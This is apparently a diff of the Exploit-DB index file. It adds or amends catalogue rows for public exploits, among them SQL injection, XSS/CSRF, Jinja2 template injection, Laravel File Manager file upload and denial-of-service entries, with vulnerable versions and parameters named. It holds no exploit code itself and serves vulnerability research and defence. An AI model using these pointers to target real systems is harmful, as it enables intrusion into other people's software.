+46383,exploits/windows/dos/46383.py,"Navicat for Oracle 12.1.15 - _Password_ Denial of Service (PoC)",2019-02-15,"Victor Mondragón",dos,windows,
+46385,exploits/windows/dos/46385.py,"VSCO 1.1.1.0 - Denial of Service (PoC)",2019-02-15,0xB9,dos,windows,
+46388,exploits/linux/dos/46388.txt,"Linux - 'kvm_ioctl_create_device()' NULL Pointer Dereference",2019-02-15,"Google Security Research",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -40586,7 +40591,7 @@ id,file,description,date,author,type,platform,port
 45840,exploits/php/webapps/45840.txt,"Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload",2018-11-13,"Ihsan Sencan",webapps,php,80
 45841,exploits/php/webapps/45841.txt,"Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download",2018-11-13,"Ihsan Sencan",webapps,php,80
 45842,exploits/php/webapps/45842.txt,"Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)",2018-11-13,"Ihsan Sencan",webapps,php,80
-45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
+45843,exploits/php/webapps/45843.txt,"Webiness Inventory 2.3 - 'order' SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
 45844,exploits/php/webapps/45844.txt,"SIPve 0.0.2-R19 - SQL Injection",2018-11-13,"Ihsan Sencan",webapps,php,80
 45845,exploits/php/webapps/45845.txt,"iServiceOnline 1.0 - 'r' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
 45847,exploits/php/webapps/45847.txt,"Helpdezk 1.1.1 - 'query' SQL Injection",2018-11-14,"Ihsan Sencan",webapps,php,80
@ -40842,3 +40847,7 @@ id,file,description,date,author,type,platform,port
 46376,exploits/php/webapps/46376.txt,"DomainMOD 4.11.01 - 'assets/edit/host.php?whid=5' Cross-Site Scripting",2019-02-14,"Mohammed Abdul Kareem",webapps,php,80
 46377,exploits/php/webapps/46377.txt,"WordPress Plugin Booking Calendar 8.4.3 - Authenticated SQL Injection",2019-02-14,B0UG,webapps,php,80
 46379,exploits/php/webapps/46379.txt,"LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)",2019-02-14,0xB9,webapps,php,80
+46384,exploits/php/webapps/46384.txt,"MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery",2019-02-15,0xB9,webapps,php,80
+46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,
+46387,exploits/php/webapps/46387.txt,"qdPM 9.1 - 'search_by_extrafields[]' SQL Injection",2019-02-15,"Mehmet EMIROGLU",webapps,php,80
+46389,exploits/php/webapps/46389.py,"UniSharp Laravel File Manager 2.0.0-alpha7 - Arbitrary File Upload",2019-02-15,"Mohammad Danish",webapps,php,80